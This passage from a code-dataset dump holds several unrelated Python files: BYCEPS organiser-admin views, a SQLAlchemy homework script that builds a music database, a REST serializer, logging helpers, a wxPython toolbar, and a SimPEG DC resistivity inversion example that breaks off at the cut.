__name__)\n\n\npermission_registry.register_enum(OrgaBirthdayPermission)\npermission_registry.register_enum(OrgaDetailPermission)\npermission_registry.register_enum(OrgaTeamPermission)\n\n\n@blueprint.route('/persons')\n@permission_required(OrgaDetailPermission.view)\n@templated\ndef persons():\n \"\"\"List brands to choose from.\"\"\"\n brands_with_person_counts = orga_service.get_brands_with_person_counts()\n\n return {\n 'brands_with_person_counts': brands_with_person_counts,\n }\n\n\n@blueprint.route('/persons/')\n@permission_required(OrgaDetailPermission.view)\n@templated\ndef persons_for_brand(brand_id):\n \"\"\"List organizers for the brand with details.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n orgas = orga_service.get_orgas_for_brand(brand.id)\n\n return {\n 'brand': brand,\n 'orgas': orgas,\n }\n\n\n@blueprint.route('/persons//create')\n@permission_required(OrgaTeamPermission.administrate_memberships)\n@templated\ndef create_orgaflag_form(brand_id):\n \"\"\"Show form to give the organizer flag to a user.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n form = OrgaFlagCreateForm()\n\n return {\n 'brand': brand,\n 'form': form,\n }\n\n\n@blueprint.route('/persons/', methods=['POST'])\n@permission_required(OrgaTeamPermission.administrate_memberships)\ndef create_orgaflag(brand_id):\n \"\"\"Give the organizer flag to a user.\"\"\"\n brand = _get_brand_or_404(brand_id)\n\n form = OrgaFlagCreateForm(request.form)\n\n user_id = form.user_id.data.strip()\n user = _get_user_or_404(user_id)\n\n orga_flag = orga_service.create_orga_flag(brand.id, user.id)\n\n flash_success('{} wurde das Orga-Flag für die Marke {} gegeben.',\n orga_flag.user.screen_name, orga_flag.brand.title)\n return redirect_to('.persons_for_brand', brand_id=orga_flag.brand.id)\n\n\n@blueprint.route('/persons//', methods=['DELETE'])\n@permission_required(OrgaTeamPermission.administrate_memberships)\n@respond_no_content\ndef remove_orgaflag(brand_id, user_id):\n \"\"\"Remove the organizer flag for a brand from a person.\"\"\"\n orga_flag = orga_service.find_orga_flag(brand_id, user_id)\n\n if orga_flag is None:\n abort(404)\n\n brand = orga_flag.brand\n user = orga_flag.user\n\n orga_service.delete_orga_flag(orga_flag)\n\n flash_success('{} wurde das Orga-Flag für die Marke {} entzogen.',\n user.screen_name, brand.title)\n\n\n@blueprint.route('/persons//export')\n@permission_required(OrgaDetailPermission.view)\n@textified\ndef export_persons(brand_id):\n \"\"\"Export the list of organizers for the brand as a CSV document in\n Microsoft Excel dialect.\n \"\"\"\n brand = _get_brand_or_404(brand_id)\n\n field_names = [\n 'Benutzername',\n 'Vorname',\n 'Nachname',\n 'Geburtstag',\n 'Straße',\n 'PLZ',\n 'Ort',\n 'Land',\n 'E-Mail-Adresse',\n 'Telefonnummer',\n ]\n\n def to_dict(user):\n date_of_birth = user.detail.date_of_birth.strftime('%d.%m.%Y') \\\n if user.detail.date_of_birth else None\n\n return {\n 'Benutzername': user.screen_name,\n 'Vorname': user.detail.first_names,\n 'Nachname': user.detail.last_name,\n 'Geburtstag': date_of_birth,\n 'Straße': user.detail.street,\n 'PLZ': user.detail.zip_code,\n 'Ort': user.detail.city,\n 'Land': user.detail.country,\n 'E-Mail-Adresse': user.email_address,\n 'Telefonnummer': user.detail.phone_number,\n }\n\n orgas = orga_service.get_orgas_for_brand(brand.id)\n orgas.sort(key=attrgetter('screen_name'))\n rows = map(to_dict, orgas)\n return serialize_to_csv(field_names, rows)\n\n\n@blueprint.route('/birthdays')\n@permission_required(OrgaBirthdayPermission.list)\n@templated\ndef birthdays():\n orgas = list(\n orga_birthday_service.collect_orgas_with_next_birthdays(limit=5))\n\n return {\n 'orgas': orgas,\n }\n\n\ndef _get_brand_or_404(brand_id):\n brand = brand_service.find_brand(brand_id)\n\n if brand is None:\n abort(404)\n\n return brand\n\n\ndef _get_user_or_404(user_id):\n user = user_service.find_user(user_id)\n\n if user is None:\n abort(404)\n\n return user\n","repo_name":"agreements/byceps","sub_path":"byceps/blueprints/orga_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"}
+{"seq_id":"38874396888","text":"import sqlalchemy\n\n\n\ndef create_DB(connection):\n connection.execute(\n \"\"\"\n create table if not exists Execut (\n Idexec serial primary key,\n Name varchar(40) not null\n );\n\n create table if not exists Albums (\n Idalbum serial primary key,\n Name varchar(40) not null,\n Year integer not null\n );\n\n create table if not exists Song (\n Idsong serial primary key,\n Name varchar(40) not null,\n Length integer not null,\n Idalbum integer not null,\n FOREIGN KEY (Idalbum) REFERENCES Albums (Idalbum)\n );\n\n create table if not exists Collection (\n Idcollection serial primary key,\n Name varchar(40) not null,\n Year integer not null\n );\n\n create table if not exists Styles (\n Idstyle serial primary key,\n Name varchar(40) not null\n );\n \"\"\")\n\ndef create_link(connection):\n connection.execute(\n \"\"\"\n create table if not exists CollectionSong (\n Idcollection integer references Collection(Idcollection),\n Idsong integer references Song(Idsong),\n constraint CollectionSong_pk primary key (Idcollection, Idsong)\n );\n\n create table if not exists AlbumsExec (\n Idalbum integer references Albums(Idalbum),\n Idexec integer references Execut(Idexec),\n constraint AlbumsExec_pk primary key (Idalbum, Idexec)\n );\n\n create table if not exists StylesExec (\n Idstyle integer references Styles(Idstyle),\n Idexec integer references Execut(Idexec),\n constraint StylesExec_pk primary key (Idstyle, Idexec)\n );\n \"\"\")\n\ndef add_execut_DB(connection):\n table = 'Execut'\n column = 'Name'\n executors = ['Исполнитель один',\n 'Второй',\n 'Третий',\n 'Четвертый',\n 'Пятый исполнитель',\n 'Шестой',\n 'Седьмой',\n 'Восьмой'] # xD\n for executor in executors:\n value = f\"\"\"insert into {table}({column}) values('{executor}');\"\"\"\n connection.execute(value)\n\ndef add_albums_DB(connection):\n table = 'albums'\n column1 = 'name'\n column2 = 'year'\n albums = [['One',2020],\n ['Two',2021],\n ['Three',2019],\n ['Four',1999],\n ['Five',2000],\n ['Six',2018],\n ['Seven',1998],\n ['Eigth',2012]]\n for album in albums:\n value = f\"\"\"insert into {table}({column1},{column2}) values('{album[0]}',{album[1]});\"\"\"\n connection.execute(value)\n\ndef add_styles_DB(connection):\n table = 'styles'\n column = 'name'\n styles = ['One',\n 'Two',\n 'Three',\n 'Four',\n 'Five',\n 'Six',\n 'Seven',\n 'Eigth']\n for style in styles:\n value = f\"\"\"insert into {table}({column}) values('{style}');\"\"\"\n connection.execute(value)\n\ndef add_collections_DB(connection):\n table = 'collection'\n column1 = 'name'\n column2 = 'year'\n collections = [['Сборник один',2020],\n ['Сборник два',2021],\n ['Сборник три',2019],\n ['Сборник четыре',2017],\n ['Сборник пять',2016],\n ['Сборник шесть',1976],\n ['Сборник семь',2018],\n ['Сборник восемь',2012]]\n for collection in collections:\n value = f\"\"\"insert into {table}({column1},{column2}) values('{collection[0]}',{collection[1]});\"\"\"\n connection.execute(value)\n\ndef add_songs_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n column3 = 'idalbum'\n songs = [['Трек 1',125,2],\n ['Трек 2',102,5],\n ['Трек 3',402,5],\n ['Трек 4',356,5],\n ['Трек my',296,2],\n ['Трек 6',159,1],\n ['Трек 7',180,1],\n ['Трек 8',195,3],\n ['Трек 9',235,4],\n ['Трек 10',160,6],\n ['Трек 11',162,7],\n ['Трек мой',188,8],\n ['Трек 13',210,3],\n ['Мой трек',295,8],\n ['Трек 13',212,6],\n ['Трек 14',265,5],\n ['Трек 15',333,3]]\n for song in songs:\n value = f\"\"\"insert into {table}({column1},{column2},{column3}) values('{song[0]}',{song[1]},{song[2]});\"\"\"\n connection.execute(value)\n\ndef add_albumexec_DB(connection):\n table = 'albumsexec'\n column1 = 'idalbum'\n column2 = 'idexec'\n albumexecs = [[1,2],\n [2,5],\n [3,2],\n [6,1],\n [8,1],\n [8,3],\n [7,4],\n [6,5],\n [3,7],\n [2,3],\n [1,3],\n [2,8],\n [4,6],\n [5,3],\n [4,3]]\n for albumexec in albumexecs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({albumexec[0]},{albumexec[1]});\"\"\"\n connection.execute(value)\n\ndef add_collectionsong_DB(connection):\n table = 'collectionsong'\n column1 = 'idcollection'\n column2 = 'idsong'\n collectionsongs = [[1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5],\n [6,6],\n [7,7],\n [8,8],\n [1,9],\n [2,10],\n [3,11],\n [4,12],\n [5,13],\n [6,14],\n [7,15]]\n for collectionsong in collectionsongs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({collectionsong[0]},{collectionsong[1]});\"\"\"\n connection.execute(value)\n\n\ndef add_stylesexec_DB(connection):\n table = 'stylesexec'\n column1 = 'idstyle'\n column2 = 'idexec'\n stylesexecs = [[1,1],\n [2,2],\n [3,3],\n [4,4],\n [5,5],\n [1,6],\n [2,7],\n [3,8],\n [4,7],\n [5,6],\n [1,5],\n [2,4],\n [3,5],\n [4,2],\n [5,1]]\n for stylesexec in stylesexecs:\n value = f\"\"\"insert into {table}({column1},{column2}) values({stylesexec[0]},{stylesexec[1]});\"\"\"\n connection.execute(value)\n\n\n\ndef select_albums_2018_DB(connection):\n table = 'albums'\n column1 = 'name'\n column2 = 'year'\n value = f\"\"\"select {column1},{column2} from {table} where {column2}=2018;\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nназвание и год выхода альбомов, вышедших в 2018 году')\n print(data)\n\ndef select_long_song_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n value = f\"\"\"select {column1},{column2} from {table} ORDER BY {column2} DESC LIMIT 1;\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nназвание и продолжительность самого длительного трека')\n print(data)\n\ndef select_song_3_5_DB(connection):\n table = 'song'\n column1 = 'name'\n column2 = 'length'\n min_length = int(3.5*60)\n value = f\"\"\"select {column1} from {table} where {column2} >= {min_length};\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nназвание треков, продолжительность которых не менее 3,5 минуты')\n print(data)\n\ndef select_collections_2018_2020_DB(connection):\n table = 'collection'\n column1 = 'name'\n column2 = 'year'\n value = f\"\"\"select {column1},{column2} from {table} where {column2} BETWEEN 2018 AND 2020;\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nназвания сборников, вышедших в период с 2018 по 2020 год включительно')\n print(data)\n\ndef select_exec_1_slovo_DB(connection):\n table = 'execut'\n column = 'name'\n value = f\"\"\"select {column} from {table} where {column} not like '%% %%';\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nисполнители, чье имя состоит из 1 слова')\n print(data)\n\ndef select_song_my_DB(connection):\n table = 'song'\n column = 'name'\n value = f\"\"\"select {column} from {table} where lower ({column}) like lower ('%%my%%') OR lower ({column}) like lower ('%%мой%%');\"\"\"\n data = connection.execute(value).fetchall()\n print('\\nназвание треко��, которые содержат слово \"мой\"/\"my\"')\n print(data)\n\n\n\ndef create_tables(connection):\n '''Блок создания таблиц'''\n create_DB(connection) # создание таблиц\n create_link(connection) # создание таблиц-связей\n\ndef add_data_in_tables(connection):\n '''Блок добавления данных\n SQL 1\n Заполните базу данных из предыдущего домашнего задания. В ней должно быть:\n\n не менее 8 исполнителей;\n не менее 5 жанров;\n не менее 8 альбомов;\n не менее 15 треков;\n не менее 8 сборников.\n Внимание! Должны быть заполнены все поля каждой таблицы,\n в т.ч. таблицы связей\n (исполнителей с жанрами, исполнителей с альбомами, сборников с треками).\n '''\n add_execut_DB(connection)\n add_albums_DB(connection)\n add_styles_DB(connection)\n add_collections_DB(connection)\n add_songs_DB(connection)\n add_albumexec_DB(connection)\n add_collectionsong_DB(connection)\n add_stylesexec_DB(connection)\n\ndef select_tables(connection):\n '''Блок SELECT запросов\n SQL 2\n Написать SELECT-запросы, которые выведут информацию согласно инструкциям ниже.\n Внимание! Результаты запросов не должны быть пустыми (учтите при заполнении таблиц).\n\n название и год выхода альбомов, вышедших в 2018 году;\n название и продолжительность самого длительного трека;\n название треков, продолжительность которых не менее 3,5 минуты;\n названия сборников, вышедших в период с 2018 по 2020 год включительно;\n исполнители, чье имя состоит из 1 слова;\n название треков, которые содержат слово \"мой\"/\"my\".\n Результатом работы будет 3 файла (с INSERT, SELECT запросами и CREATE запросами из предыдущего задания)\n в формате .sql (или .py/.ipynb, если вы будете писать запросы с использованием SQLAlchemy).\n '''\n select_albums_2018_DB(connection)\n select_long_song_DB(connection)\n select_song_3_5_DB(connection)\n select_collections_2018_2020_DB(connection)\n select_exec_1_slovo_DB(connection)\n select_song_my_DB(connection)\n\nengine = sqlalchemy.create_engine('postgresql://postgres:pass@localhost:5432/postgres')\nconnection = engine.connect()\nnum = ''\nwhile num != '4':\n num = input('Введите одно из нижеперечисленных чисел: \\n1. для создания БД\\n2. для добавления данных в таблицы\\n3. для производства SELECT запросов\\n4. для выхода из программы\\n')\n if num == '1':\n create_tables(connection)\n print('Таблицы созданы')\n elif num == '2':\n try:\n add_data_in_tables(connection)\n except:\n print('Возможно данные были внесены ранее')\n print('Данные внесены в таблицы')\n elif num == '3':\n select_tables(connection)\n print('\\nSELECT запросы выполнены')\n elif num == '4':\n print('ПРОГРАММА ЗАВЕРШИЛА СВОЮ РАБОТУ')\n else:\n print('Вами введено некорректный символ. Введите одно из нижеперечисленных чисел: \\n1. для создания БД\\n2. для добавления данных в таблицы\\n3. для производства SELECT запросово')\n","repo_name":"pavzzz2909/Homeworks-Netology","sub_path":"3 Базы данных для Python разработчиков/3 Select-запросы, выборки из одной таблицы/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39826635427","text":"from rest_framework import serializers\nfrom ..models.location import Location\nfrom .address_serializer import AddressSerializer\n\n\nclass LocationSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer for Location model.\n \"\"\"\n address = AddressSerializer()\n\n class Meta:\n model = Location\n fields = '__all__'\n read_only_fields = ['id']\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new Location instance.\n \"\"\"\n address_data = validated_data.pop('address')\n address_serializer = AddressSerializer(data=address_data)\n address_serializer.is_valid(raise_exception=True)\n address = address_serializer.save()\n return Location.objects.create(address=address, **validated_data)\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing Location instance.\n \"\"\"\n address_data = validated_data.pop('address', None)\n if address_data:\n address_serializer = AddressSerializer(instance.address, data=address_data)\n address_serializer.is_valid(raise_exception=True)\n address = address_serializer.save()\n validated_data['address'] = address\n instance.location_name = validated_data.get('location_name', instance.location_name)\n instance.description = validated_data.get('description', instance.description)\n instance.photo = validated_data.get('photo', instance.photo)\n instance.save()\n return instance\n","repo_name":"azaz0/search-trip","sub_path":"trip_management/serializers/location_serializer.py","file_name":"location_serializer.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1087046964","text":"import time\nfrom contextlib import contextmanager\n\nimport numpy as np\n\nfrom imitation.helpers.misc_util import zipsame, prettify_time, var_shape, numel\n\n\ndef cell(x, width):\n \"\"\"Format a tabular cell to the specified width\"\"\"\n if isinstance(x, np.ndarray):\n assert x.ndim == 0\n x = x.item()\n rep = \"{:G}\".format(x) if isinstance(x, float) else str(x)\n return rep + (' ' * (width - len(rep)))\n\n\ndef columnize(names, tuples, widths, indent=2):\n \"\"\"Generate and return the content of table\n (w/o logging or printing anything)\n\n Args:\n width (int): Width of each cell in the table\n indent (int): Indentation spacing prepended to every row in the table\n \"\"\"\n indent_space = indent * ' '\n # Add row containing the names\n table = indent_space + \" | \".join(cell(name, width) for name, width in zipsame(names, widths))\n table_width = len(table)\n # Add header hline\n table += '\\n' + indent_space + ('-' * table_width)\n for tuple_ in tuples:\n # Add a new row\n table += '\\n' + indent_space\n table += \" | \".join(cell(value, width) for value, width in zipsame(tuple_, widths))\n # Add closing hline\n table += '\\n' + indent_space + ('-' * table_width)\n return table\n\n\ndef colorize(string, color, bold=False, highlight=False):\n color2num = {'gray': 30, 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34,\n 'magenta': 35, 'cyan': 36, 'white': 37, 'crimson': 38}\n attr = []\n num = color2num[color]\n if highlight:\n num += 10\n attr.append(str(num))\n if bold:\n attr.append('1')\n return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\n\ndef log_module_info(logger, name, *components):\n assert len(components) > 0, \"components list is empty\"\n for component in components:\n logger.info(\"logging {}/{} specs\".format(name, component.name))\n names = [var.name for var in component.trainable_vars]\n shapes = [var_shape(var) for var in component.trainable_vars]\n num_paramss = [numel(var) for var in component.trainable_vars]\n zipped_info = zipsame(names, shapes, num_paramss)\n logger.info(columnize(names=['name', 'shape', 'num_params'],\n tuples=zipped_info,\n widths=[40, 16, 10]))\n logger.info(\" total num params: {}\".format(sum(num_paramss)))\n\n\ndef timed_cm_wrapper(comm=None, logger=None, color_message='magenta', color_elapsed_time='cyan'):\n \"\"\"Wraps a context manager that records the time taken by encapsulated ops\"\"\"\n @contextmanager\n def _timed(message):\n \"\"\"Display the time it took for the mpi master\n to perform the task within the context manager\n \"\"\"\n if comm is None or comm.Get_rank() == 0:\n logger.info(colorize(message, color=color_message))\n tstart = time.time()\n yield\n logger.info(colorize(\" [done in {:.3f} seconds]\".format(time.time() - tstart),\n color=color_elapsed_time))\n else:\n yield\n return _timed\n\n\ndef pretty_iter(logger, i):\n \"\"\"Display the current iteration with a colored decorator\"\"\"\n logger.info(colorize(\"I T E R A T I O N {}\".format(i), color='blue'))\n\n\ndef pretty_elapsed(logger, tstart):\n \"\"\"Display the elapsed time with a colored decorator\"\"\"\n elapsed = prettify_time(time.time() - tstart)\n # logger.info('')\n logger.info(colorize(\"E L A P S E D {}\".format(elapsed), color='green'))\n","repo_name":"lionelblonde/sam-tf","sub_path":"imitation/helpers/console_util.py","file_name":"console_util.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
+{"seq_id":"4905289454","text":"__author__ = 'Joao'\nfrom SolTw import _Utils as _Utils\n\n\nclass Hashtags:\n def __init__(self, dictionary=dict()):\n dictionary= _Utils.CastToDictionary(dictionary)\n dictionary= _Utils.removeEmptyFields(dictionary)\n self.indices=\"\"\n self.text=\"\"\n if (\"indices\" in dictionary):\n self.indices=dictionary[\"indices\"]\n if (\"text\" in dictionary):\n self.text=dictionary[\"text\"]\n\n\n def __str__(self):\n dic=self.__dict__\n lista=list()\n for key in dic:\n lista.append(key)\n for key in lista:\n if dic[key]==None or dic[key]==\"\":\n del dic[key]\n return \"HASHTAGS: \"+str(dic)\n\n def __repr__(self):\n dic=self.__dict__\n lista=list()\n for key in dic:\n lista.append(key)\n for key in lista:\n if dic[key]==None or dic[key]==\"\":\n del dic[key]\n return \"HASHTAGS: \"+str(dic)","repo_name":"JoaoMachadoJr/SOL","sub_path":"Projeto/SolTw/_Hashtags.py","file_name":"_Hashtags.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35415368981","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 27/05/2014\n\n@author: aferreira\n'''\n\nimport wx\nfrom py.una.pol.tava.presenter.ptoolbar import ToolBarPresenter\nfrom wx import GetTranslation as _\nimport py.una.pol.tava.view.vi18n as C\nimport py.una.pol.tava.view.vimages as I\n\n\nclass MainToolBar(wx.ToolBar):\n '''\n Clase que representa al ToolBar Principal desplegando algunas opciones\n de trabajo que pueden utilizarse dentro del área de trabajo.\n '''\n\n def __init__(self, parent):\n '''\n Constructor para la clase MainToolBar\n :param parent: referencia a la clase padre de MainToolBar.\n '''\n super(MainToolBar, self).__init__(parent, wx.TB_HORIZONTAL)\n\n # Creacion del Presenter\n self.presenter = ToolBarPresenter(self)\n\n # Creacion de los ids de los diferentes tools\n self.SetIdReferences()\n\n self.SetToolBitmapSize((16, 16))\n\n # Nuevo Proyecto\n new_bmp = wx.ArtProvider.GetBitmap(wx.ART_NEW)\n self.AddLabelTool(self.ID_NEW_PRO, '', new_bmp)\n self.EnableTool(self.ID_NEW_PRO, True)\n self.Bind(wx.EVT_TOOL, self.OnProjectNew, id=self.ID_NEW_PRO)\n\n # Abrir Proyecto\n open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN)\n self.AddLabelTool(self.ID_OPEN_PRO, '', open_bmp)\n self.EnableTool(self.ID_OPEN_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectOpen, id=self.ID_OPEN_PRO)\n\n # Cerrar Proyecto\n self.AddLabelTool(self.ID_CLOSE_PRO, '', I.close_png)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectClose, id=self.ID_CLOSE_PRO)\n\n # Eliminar Proyecto\n self.AddLabelTool(self.ID_DEL_PRO, '', I.delete_png)\n self.EnableTool(self.ID_DEL_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectDelete, id=self.ID_DEL_PRO)\n\n # Blog de Proyecto\n self.AddLabelTool(self.ID_BLOG_PRO, '', I.blog_png)\n self.EnableTool(self.ID_BLOG_PRO, False)\n\n self.AddSeparator()\n\n # Desocultar Proyecto\n self.AddLabelTool(self.ID_UNHIDE_PRO, '', I.hide_left_png)\n self.EnableTool(self.ID_UNHIDE_PRO, True)\n self.Bind(wx.EVT_TOOL, self.OnProjectUnHide, id=self.ID_UNHIDE_PRO)\n\n # Ocultar Proyecto\n self.AddLabelTool(self.ID_HIDE_PRO, '', I.hide_right_png)\n self.EnableTool(self.ID_HIDE_PRO, False)\n self.Bind(wx.EVT_TOOL, self.OnProjectHide, id=self.ID_HIDE_PRO)\n\n self.AddSeparator()\n\n # Salir Aplicacion\n exit_bmp = wx.ArtProvider.GetBitmap(wx.ART_QUIT)\n self.AddLabelTool(self.ID_EXIT_PRO, '', exit_bmp)\n self.Bind(wx.EVT_TOOL, parent.OnApplicationExit, id=self.ID_EXIT_PRO)\n\n # Establecemos los labels\n self.SetLabels()\n\n # Finalizando la creacion del toolbar\n self.Realize()\n\n def SetIdReferences(self):\n self.ID_NEW_PRO = wx.NewId()\n self.ID_OPEN_PRO = wx.NewId()\n self.ID_CLOSE_PRO = wx.NewId()\n self.ID_DEL_PRO = wx.NewId()\n self.ID_BLOG_PRO = wx.NewId()\n self.ID_EXIT_PRO = wx.NewId()\n self.ID_HIDE_PRO = wx.NewId()\n self.ID_UNHIDE_PRO = wx.NewId()\n\n def EnableDisableOpenProject(self):\n self.EnableTool(self.ID_DEL_PRO, True)\n self.EnableTool(self.ID_CLOSE_PRO, True)\n self.EnableTool(self.ID_BLOG_PRO, True)\n self.EnableTool(self.ID_OPEN_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, False)\n\n def EnableDisableCloseProject(self):\n self.EnableTool(self.ID_DEL_PRO, True)\n self.EnableTool(self.ID_OPEN_PRO, True)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.EnableTool(self.ID_BLOG_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, True)\n\n def DisableAllProject(self):\n self.EnableTool(self.ID_DEL_PRO, False)\n self.EnableTool(self.ID_CLOSE_PRO, False)\n self.EnableTool(self.ID_BLOG_PRO, False)\n self.EnableTool(self.ID_OPEN_PRO, False)\n self.EnableTool(self.ID_HIDE_PRO, False)\n\n def OnProjectClose(self, event):\n self.presenter.CloseProject()\n\n def OnProjectOpen(self, event):\n self.presenter.OpenProject()\n\n def OnProjectDelete(self, event):\n self.presenter.DeleteProject()\n\n def OnProjectNew(self, event):\n self.presenter.NewProject()\n\n def OnProjectHide(self, event):\n self.presenter.HideProject()\n\n def OnProjectUnHide(self, event):\n self.presenter.UnHideProject()\n\n def SetLabels(self):\n self.SetToolShortHelp(self.ID_NEW_PRO, _(C.MTB_NP))\n self.SetToolShortHelp(self.ID_OPEN_PRO, _(C.MTB_OP))\n self.SetToolShortHelp(self.ID_CLOSE_PRO, _(C.MTB_CP))\n self.SetToolShortHelp(self.ID_DEL_PRO, _(C.MTB_DP))\n self.SetToolShortHelp(self.ID_BLOG_PRO, _(C.MTB_BP))\n self.SetToolShortHelp(self.ID_EXIT_PRO, _(C.MTB_EX))\n self.SetToolShortHelp(self.ID_HIDE_PRO, _(C.MTB_HP))\n self.SetToolShortHelp(self.ID_UNHIDE_PRO, _(C.MTB_UHP))\n","repo_name":"abrahanfretes/tava_antes","sub_path":"py/una/pol/tava/view/vtoolbar.py","file_name":"vtoolbar.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33213138704","text":"\"\"\"\n2.5D DC inversion of with Topography\n====================================\n\nThis is an example for 2.5D DC inversion. Earth includes a topography,\nand below the topography conductive and resistive cylinders are embedded.\nSensitivity weighting is used for the inversion.\nApproximate depth of investigation is computed by selecting\n1 percent of max(sqrt(diag(JtJ))), and regions having smaller sensitivity\nthan this is blanked.\nUser is promoted to try different suvey_type such as 'pole-dipole',\n'dipole-pole', and 'pole-pole'.\n\"\"\"\n\nfrom SimPEG.electromagnetics.static import resistivity as DC\nfrom SimPEG.electromagnetics.static.utils import generate_dcip_survey, genTopography\nfrom SimPEG import (\n maps,\n utils,\n data_misfit,\n regularization,\n optimization,\n inversion,\n inverse_problem,\n directives,\n)\nfrom discretize.utils import active_from_xyz\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nfrom pylab import hist\n\ntry:\n from pymatsolver import Pardiso as Solver\nexcept ImportError:\n from SimPEG import SolverLU as Solver\n\n\ndef run(plotIt=True, survey_type=\"dipole-dipole\"):\n np.random.seed(1)\n # Initiate I/O class for DC\n IO = DC.IO()\n # Obtain ABMN locations\n\n xmin, xmax = 0.0, 200.0\n ymin, ymax = 0.0, 0.0\n zmin, zmax = 0, 0\n endl = np.array([[xmin, ymin, zmin], [xmax, ymax, zmax]])\n # Generate DC survey object\n survey = generate_dcip_survey(\n endl, survey_type=survey_type, dim=2, a=10, b=10, n=10\n )\n survey = IO.from_abmn_locations_to_survey(\n survey.locations_a,\n survey.locations_b,\n survey.locations_m,\n survey.locations_n,\n survey_type,\n data_dc_type=\"volt\",\n )\n\n # Obtain 2D TensorMesh\n mesh, actind = IO.set_mesh()\n topo, mesh1D = genTopography(mesh, -10, 0, its=100)\n actind = active_from_xyz(mesh, np.c_[mesh1D.cell_centers_x, topo])\n survey.drape_electrodes_on_topography(mesh, actind, option=\"top\")\n\n # Build a conductivity model\n blk_inds_c = utils.model_builder.getIndicesSphere(\n np.r_[60.0, -25.0], 12.5, mesh.gridCC\n )\n blk_inds_r = utils.model_builder.getIndicesSphere(\n np.r_[140.0, -25.0], 12.5, mesh.gridCC\n )\n sigma = np.ones(mesh.nC) * 1.0 / 100.0\n sigma[blk_inds_c] = 1.0 / 10.0\n sigma[blk_inds_r] = 1.0 / 1000.0\n sigma[~actind] = 1.0 / 1e8\n rho = 1.0 / sigma\n\n # Show the true conductivity model\n if plotIt:\n fig = plt.figure(figsize=(12, 3))\n ax = plt.subplot(111)\n temp = rho.copy()\n temp[~actind] = np.nan\n out = mesh.plot_image(\n temp,\n grid=True,\n ax=ax,\n grid_opts={\"alpha\": 0.2},\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n )\n ax.plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"k.\"\n )\n ax.set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax.set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[0])\n cb.set_label(\"Resistivity (ohm-m)\")\n ax.set_aspect(\"equal\")\n plt.show()\n\n # Use Exponential Map: m = log(rho)\n actmap = maps.InjectActiveCells(mesh, indActive=actind, valInactive=np.log(1e8))\n mapping = maps.ExpMap(mesh) * actmap\n\n # Generate mtrue\n mtrue = np.log(rho[actind])\n\n # Generate 2.5D DC problem\n # \"N\" means potential is defined at nodes\n prb = DC.Simulation2DNodal(\n mesh, survey=survey, rhoMap=mapping, storeJ=True, Solver=Solver, verbose=True\n )\n\n # Make synthetic DC data with 5% Gaussian noise\n data = prb.make_synthetic_data(mtrue, relative_error=0.05, add_noise=True)\n\n IO.data_dc = data.dobs\n # Show apparent resisitivty pseudo-section\n if plotIt:\n IO.plotPseudoSection(data=data.dobs, data_type=\"apparent_resistivity\")\n\n # Show apparent resisitivty histogram\n if plotIt:\n fig = plt.figure()\n out = hist(data.dobs, bins=20)\n plt.xlabel(r\"Apparent Resisitivty ($\\Omega$m)\")\n plt.show()\n\n # Set initial model based upon histogram\n m0 = np.ones(actmap.nP) * np.log(100.0)\n\n # Set standard_deviation\n # floor (10 ohm-m)\n eps = 1.0\n # percentage\n relative = 0.05\n dmisfit = data_misfit.L2DataMisfit(simulation=prb, data=data)\n uncert = abs(data.dobs) * relative + eps\n dmisfit.standard_deviation = uncert\n\n # Map for a regularization\n regmap = maps.IdentityMap(nP=int(actind.sum()))\n\n # Related to inversion\n reg = regularization.Sparse(mesh, indActive=actind, mapping=regmap)\n opt = optimization.InexactGaussNewton(maxIter=15)\n invProb = inverse_problem.BaseInvProblem(dmisfit, reg, opt)\n beta = directives.BetaSchedule(coolingFactor=5, coolingRate=2)\n betaest = directives.BetaEstimate_ByEig(beta0_ratio=1e0)\n target = directives.TargetMisfit()\n updateSensW = directives.UpdateSensitivityWeights()\n update_Jacobi = directives.UpdatePreconditioner()\n inv = inversion.BaseInversion(\n invProb, directiveList=[beta, target, updateSensW, betaest, update_Jacobi]\n )\n prb.counter = opt.counter = 